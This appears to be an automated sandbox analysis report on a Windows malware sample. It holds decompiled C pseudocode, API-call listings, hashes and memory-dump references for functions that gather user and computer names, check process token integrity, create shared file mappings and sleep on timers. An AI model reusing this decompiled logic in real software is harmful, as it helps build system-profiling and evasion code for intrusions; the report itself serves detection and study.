								asm("bswap eax");
								_t64 =  *0xe8a2d4; // 0x460d5a8
								_t18 = _t64 + 0xe8b84f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0xe8a32c = _t87;
						}
						_t38 = E00E860E1();
						 *0xe8a2c8 =  *0xe8a2c8 ^ 0xe8fa7dd7;
						 *0xe8a31c = _t38;
						_t39 = E00E86837(0x60);
						__eflags = _t39;
						 *0xe8a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0xe8a37c; // 0x5499630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0xe8a37c; // 0x5499630
							 *_t56 = 0xe8b83e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0xe8a290, _t84, 0x43);
							__eflags = _t42;
							 *0xe8a314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0xe8a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0xe8a2d4; // 0x460d5a8
								_t19 = _t76 + 0xe8b53a; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xe892a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00E84454( ~_v8 &  *0xe8a2c8, 0xe8a00c); // executed
								_t84 = E00E82206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00E81376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00E82022(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00E82439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0xe8a14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00E86BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x00e853f2
0x00e853fd
0x00e85400
0x00e85403
0x00e85406
0x00e8540d
0x00e8540f
0x00e8541b
0x00e8541d
0x00e8541d
0x00e85426
0x00e8542e
0x00e85431
0x00e8544b
0x00e85450
0x00e85451
0x00e85453
0x00e85458
0x00e8545d
0x00e8545f
0x00e85466
0x00e85470
0x00e85476
0x00e85483
0x00e8548a
0x00e8548f
0x00e8548f
0x00e85498
0x00e854c1
0x00e854c4
0x00e854d1
0x00e854d8
0x00e854e4
0x00e854e6
0x00e854e8
0x00e854ed
0x00e854f3
0x00e854f9
0x00e854ff
0x00e85502
0x00e85507
0x00e8550f
0x00e85511
0x00e85511
0x00e85514
0x00e85514
0x00e8551a
0x00e8551f
0x00e85527
0x00e8552c
0x00e85531
0x00e85533
0x00e85538
0x00e85567
0x00e8553a
0x00e8553f
0x00e85544
0x00e85549
0x00e85550
0x00e85556
0x00e8555b
0x00e85561
0x00e85561
0x00e85568
0x00e8556a
0x00e85579
0x00e8557f
0x00e85581
0x00e85586
0x00e855b2
0x00e85588
0x00e85588
0x00e8558e
0x00e8559b
0x00e855a1
0x00e855a1
0x00e855a9
0x00e855ab
0x00e855b3
0x00e855b5
0x00e855bc
0x00e855c9
0x00e855d3
0x00e855d5
0x00e855d7
0x00000000
0x00000000
0x00e855d9
0x00e855de
0x00e855e0
0x00e855e7
0x00e855eb
0x00e855ee
0x00e85603
0x00e85607
0x00e8560c
0x00000000
0x00e8560c
0x00e855f0
0x00e855f2
0x00000000
0x00000000
0x00e855f4
0x00e855fd
0x00e855ff
0x00e85601
0x00000000
0x00000000
0x00000000
0x00e85601
0x00e855e4
0x00e855e4
0x00e855b5
0x00e8549a
0x00e8549a
0x00e8549f
0x00e8560e
0x00e85612
0x00e8561a
0x00e8561a
0x00000000
0x00e85612
0x00e854a5
0x00e854a8
0x00e854a8
0x00e854aa
0x00e854ad
0x00e854b5
0x00e854bc
0x00000000
0x00e85622
0x00e85622
0x00e85625
0x00e8562a
0x00e8562a

APIs

Part of subcall function 00E858F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,00E8540B,00000000,00000000,00000000,?,?,?,?,?,00E86BD8,?,00000001), ref: 00E85907

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00E8A2FC,00000000), ref: 00E85476
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00E86BD8,?,00000001), ref: 00E8548F
wsprintfA.USER32 ref: 00E8550F
memset.NTDLL ref: 00E8553F
RtlInitializeCriticalSection.NTDLL(054995F0), ref: 00E85550
RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 00E85579
wsprintfA.USER32 ref: 00E855A9

Part of subcall function 00E84454: GetUserNameW.ADVAPI32(00000000,00E855CE), ref: 00E8448B
Part of subcall function 00E84454: RtlAllocateHeap.NTDLL(00000000,00E855CE), ref: 00E844A2
Part of subcall function 00E84454: GetUserNameW.ADVAPI32(00000000,00E855CE), ref: 00E844AF
Part of subcall function 00E84454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00E855CE,?,?,?,?,?,00E86BD8,?,00000001), ref: 00E844D0
Part of subcall function 00E84454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00E844F7
Part of subcall function 00E84454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00E8450B
Part of subcall function 00E84454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00E84518
Part of subcall function 00E84454: HeapFree.KERNEL32(00000000,00000000), ref: 00E84536

Part of subcall function 00E86837: RtlAllocateHeap.NTDLL(00000000,00000000,00E84197), ref: 00E86843

Strings

!}, xrefs: 00E8561A

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID: !}
API String ID: 2910951584-3622134579
Opcode ID: deed8a60d7772afe4e0ea850bd6e2f62ffb1e460527c6829f06c8c8f8266e983
Instruction ID: fc2b6b081a8beb020860e484d6fe95eaaae9c7d380389ef730bd508e8686babb
Opcode Fuzzy Hash: deed8a60d7772afe4e0ea850bd6e2f62ffb1e460527c6829f06c8c8f8266e983
Instruction Fuzzy Hash: BD51E0B2D40615EFEB21FBA5DC45BAE73E9AB44704F181026E90CF7260EB74DD448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E86384, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00E86384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00E87D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xe8a2d4; // 0x460d5a8
				_t5 = _t13 + 0xe8b8a2; // 0x5498e4a
				_t6 = _t13 + 0xe8b57c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00E87A6A();
				_t17 = CreateFileMappingW(0xffffffff, 0xe8a2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00e86384
0x00e8638c
0x00e86390
0x00e86396
0x00e8639b
0x00e863a0
0x00e863a3
0x00e863a6
0x00e863ab
0x00e863ac
0x00e863af
0x00e863b4
0x00e863bb
0x00e863c5
0x00e863c7
0x00e863c8
0x00e863cb
0x00e863e7
0x00e863ed
0x00e863f1
0x00e8643f
0x00e863f3
0x00e86400
0x00e86410
0x00e86418
0x00e8642a
0x00e8642e
0x00000000
0x00000000
0x00e8641a
0x00e8641d
0x00e86422
0x00e86424
0x00e86424
0x00e86402
0x00e86404
0x00e86430
0x00e86431
0x00e86431
0x00e86400
0x00e86446

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00E85488,?,00000001,?), ref: 00E86390
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00E863A6
_snwprintf.NTDLL ref: 00E863CB
CreateFileMappingW.KERNELBASE(000000FF,00E8A2F8,00000004,00000000,00001000,?), ref: 00E863E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E85488,?), ref: 00E863F9
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00E86410
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E85488), ref: 00E86431
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E85488,?), ref: 00E86439

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: fab42450ae4db4a88774e27c92279e41ac837d4d60dfd3b582ff7eadf07346db
Instruction ID: d5d76dbbe22905facfa8abc9cedae68b445757e0479a2edb6f88f9373249fc20
Opcode Fuzzy Hash: fab42450ae4db4a88774e27c92279e41ac837d4d60dfd3b582ff7eadf07346db
Instruction Fuzzy Hash: 22210572A40214FFD721ABA4DC05FAE77B9BB44750F244021F91DF71E1DB7099048B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E8113D, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E8113D(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xe8a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00E86837(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00E850CA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00e8114a
0x00e81151
0x00e81158
0x00e8116c
0x00e81177
0x00e8118f
0x00e8119c
0x00e8119f
0x00e811a4
0x00e811af
0x00e811b3
0x00e811c2
0x00e811c6
0x00e811e2
0x00e811e2
0x00e811e6
0x00e811e6
0x00e811eb
0x00e811ef
0x00e811f5
0x00e811f6
0x00e811fd
0x00e81203

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00E8116F
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00E8118F
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00E8119F
CloseHandle.KERNEL32(00000000), ref: 00E811EF

Part of subcall function 00E86837: RtlAllocateHeap.NTDLL(00000000,00000000,00E84197), ref: 00E86843

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00E811C2
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00E811CA
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00E811DA

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 2c8b70f974ba02ac445a19462ff1453ab64ce61eecd482ee3ba916057f005f36
Instruction ID: a260ee29029c8cf96f8dbc0ab3ee1e4630f389d3665dcdb78cb801d61aff7350
Opcode Fuzzy Hash: 2c8b70f974ba02ac445a19462ff1453ab64ce61eecd482ee3ba916057f005f36
Instruction Fuzzy Hash: E8216075900209FFEB10AFD1DC44EAEBBBCEB04304F1040A6F609B2161C7714E15EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E86B0F, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00E86B0F(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0xe8a290 = _t14;
				if(_t14 != 0) {
					 *0xe8a180 = GetTickCount();
					_t16 = E00E84C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L00E87EEA();
						_t40 = _t18 + _t20;
						_t22 = E00E8414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0xe8a2ac; // 0x300
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xe8a2b8 = 1; // executed
						}
					}
					_t16 = E00E853F2(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x00e86b0f
0x00e86b24
0x00e86b2c
0x00e86b31
0x00e86b44
0x00e86b49
0x00e86b50
0x00e86bd8
0x00e86bde
0x00000000
0x00000000
0x00000000
0x00e86b56
0x00e86b56
0x00e86b5b
0x00e86b61
0x00e86b67
0x00e86b71
0x00e86b75
0x00e86b76
0x00e86b7b
0x00e86b7c
0x00e86b7d
0x00e86b82
0x00e86b88
0x00e86b91
0x00e86b97
0x00e86b9d
0x00e86ba2
0x00e86ba9
0x00e86bad
0x00e86bb5
0x00e86bbd
0x00e86bbf
0x00e86bbf
0x00e86bc7
0x00e86bc9
0x00e86bc9
0x00e86bc7
0x00e86bd3
0x00000000
0x00e86bd3
0x00e86b35
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00E86B24
GetTickCount.KERNEL32 ref: 00E86B3B
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00E86B5B
SwitchToThread.KERNEL32(?,00000001), ref: 00E86B61
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00E86B7D
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00E86B97
IsWow64Process.KERNEL32(00000300,?,?,00000001), ref: 00E86BB5

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: 24f63e8e8a6f30953b197d74381874ff282225e4e96c09b001d6a09a2104ef39
Instruction ID: 9ac3f3c81de4506528bb34020330e39128a03646a91dc84c9f3cccb6d5b171ad
Opcode Fuzzy Hash: 24f63e8e8a6f30953b197d74381874ff282225e4e96c09b001d6a09a2104ef39
Instruction Fuzzy Hash: 2A21E4B2A04214AFD710BFA6DC89A6A77D8EB44358F04493DF54DF6191E774DC088B62

Uniqueness

Uniqueness Score: -1.00%

Function 00E8624D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00E8624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xe8a2d4; // 0x460d5a8
				_t1 = _t9 + 0xe8b60c; // 0x253d7325
				_t36 = 0;
				_t28 = E00E8278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x5499631
					_t40 = E00E86837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E00E849FE(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E00E850CA(_t40);
						_t42 = E00E87565(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00E850CA(_t36);
							_t36 = _t42;
						}
						_t43 = E00E852E5(_t36, _t33);
						if(_t43 != 0) {
							E00E850CA(_t36);
							_t36 = _t43;
						}
					}
					E00E850CA(_t28);
				}
				return _t36;
			}

0x00e8624d
0x00e86250
0x00e86251
0x00e86258
0x00e8625f
0x00e86266
0x00e8626a
0x00e86271
0x00e86278
0x00e8627d
0x00e86285
0x00e8628f
0x00e86293
0x00e86297
0x00e8629d
0x00e862a2
0x00e862ac
0x00e862b2
0x00e862b4
0x00e862cb
0x00e862cf
0x00e862d2
0x00e862d7
0x00e862d7
0x00e862e0
0x00e862e4
0x00e862e7
0x00e862ec
0x00e862ec
0x00e862e4
0x00e862ef
0x00e862f4
0x00e862fa

APIs

Part of subcall function 00E8278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00E86266,253D7325,00000000,00000000,?,00000000,00E870D9), ref: 00E827F3
Part of subcall function 00E8278C: sprintf.NTDLL ref: 00E82814

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00E870D9,00000000,05499630), ref: 00E86278
lstrlen.KERNEL32(00000000,?,00000000,00E870D9,00000000,05499630), ref: 00E86280

Part of subcall function 00E86837: RtlAllocateHeap.NTDLL(00000000,00000000,00E84197), ref: 00E86843

strcpy.NTDLL ref: 00E86297
lstrcat.KERNEL32(00000000,00000000), ref: 00E862A2

Part of subcall function 00E849FE: lstrlen.KERNEL32(00000000,00000000,00E870D9,00000000,?,00E862B1,00000000,00E870D9,?,00000000,00E870D9,00000000,05499630), ref: 00E84A0F

Part of subcall function 00E850CA: RtlFreeHeap.NTDLL(00000000,00000000,00E84239,00000000,00000001,?,00000000,?,?,?,00E86B8D,00000000,?,00000001), ref: 00E850D6

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00E870D9,?,00000000,00E870D9,00000000,05499630), ref: 00E862BF

Part of subcall function 00E87565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00E862CB,00000000,?,00000000,00E870D9,00000000,05499630), ref: 00E8756F
Part of subcall function 00E87565: _snprintf.NTDLL ref: 00E875CD

Strings

=, xrefs: 00E862B9

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: e27b6f3e52694ebc4b37be44c54f59f9667ce6746b7ee156ddba7b61ef045a86
Instruction ID: bbba250192acb107c02356962d63d4d37b02ba878da936682b2813e390cab458
Opcode Fuzzy Hash: e27b6f3e52694ebc4b37be44c54f59f9667ce6746b7ee156ddba7b61ef045a86
Instruction Fuzzy Hash: F511A073901A297B87227BA99C45C7E37ED9F897143095066F90CB7212DE35CC0297E0

Uniqueness

Uniqueness Score: -1.00%

Function 00E8161A, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00E8165B
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00E816DD
StrStrIW.SHLWAPI(00000000,006E0069), ref: 00E8171C
SysFreeString.OLEAUT32(00000000), ref: 00E8173E

Part of subcall function 00E86C6D: SysAllocString.OLEAUT32(00E892B0), ref: 00E86CBD

SafeArrayDestroy.OLEAUT32(?), ref: 00E81792
SysFreeString.OLEAUT32(?), ref: 00E817A0

Part of subcall function 00E81FC2: Sleep.KERNELBASE(000001F4), ref: 00E8200A

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 9757765e3811382dd5937682392a96498c777e35a2cc436feee504857f0cefec
Instruction ID: 81845225ead3ec2a4e63fa733c61b6bca111836fcf6eec9ef7ea55b02b01eb4b
Opcode Fuzzy Hash: 9757765e3811382dd5937682392a96498c777e35a2cc436feee504857f0cefec
Instruction Fuzzy Hash: 2851EF75900249EFDB11DFE4C8848AEB7BAFF89344B148869E50DFB220D7319D46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB580, Relevance: 7.9, APIs: 2, Strings: 2, Instructions: 937COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(000008DA,6E21DBC8), ref: 6E1DB691
GetTempPathA.KERNEL32(000008DA,6E21DBC8), ref: 6E1DBED8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 6E1DB687, 6E1DBECE
$, xrefs: 6E1DBAC8

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: CurrentDirectoryPathTemp
String ID: $$C:\Users\user\AppData\Local\Temp\
API String ID: 783798388-4101747229
Opcode ID: 16002159450b9e821161a926d01914b60b87c0e311beaf278b95039da8d21d95
Instruction ID: fb069ea532264126f65eb2744822f089dbc15e133cfaf228a07c19f1f60f5935
Opcode Fuzzy Hash: 16002159450b9e821161a926d01914b60b87c0e311beaf278b95039da8d21d95
Instruction Fuzzy Hash: B582CE71509755CFC700CF79C4985AABBF2BF9A304F044A2EE185C7788E7348A4ADB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDE91, Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6E1DDECE
dllmain_crt_dispatch.LIBCMT ref: 6E1DDEE5
dllmain_raw.LIBCMT ref: 6E1DDF2D
dllmain_crt_dispatch.LIBCMT ref: 6E1DDF40
dllmain_raw.LIBCMT ref: 6E1DDF53

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: e0406f2c18ede161cfb7aefd4797816cb92a6a4d61ba615e4b5e17b78bf9f7f3
Instruction ID: a79e4bcbc0e28f905f3a571f593f5db93484067782be18904e01d93eae4cec40
Opcode Fuzzy Hash: e0406f2c18ede161cfb7aefd4797816cb92a6a4d61ba615e4b5e17b78bf9f7f3
Instruction Fuzzy Hash: 7E219172D04525AFCB518E95CC41EEF3A7DDB90798F124719F8145B250C7348E8AAFE0

Uniqueness

Uniqueness Score: -1.00%

Function 00E85C35, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00E85C8C
SysAllocString.OLEAUT32(00E81E05), ref: 00E85CCF
SysFreeString.OLEAUT32(00000000), ref: 00E85CE3
SysFreeString.OLEAUT32(00000000), ref: 00E85CF1

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 2929fa5790545c25afc16b9f09848881ef121ab2c1d228addbab239b48fbbad2
Instruction ID: de11a6fc543de438ec91aebe52b4681ebcee9a52d135cebe6fc732d16056ba44
Opcode Fuzzy Hash: 2929fa5790545c25afc16b9f09848881ef121ab2c1d228addbab239b48fbbad2
Instruction Fuzzy Hash: 79312C72900609EFCB05DF99D8C48AEBBF5BF48344B20942EF90EA7211DB759945CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00E84D09, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00E84D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00E86837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16); // executed
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00e84d15
0x00e84d19
0x00e84d1a
0x00e84d1b
0x00e84d1d
0x00e84d1f
0x00e84d24
0x00e84d27
0x00e84dbe
0x00e84dc5
0x00e84dc5
0x00e84d30
0x00e84d37
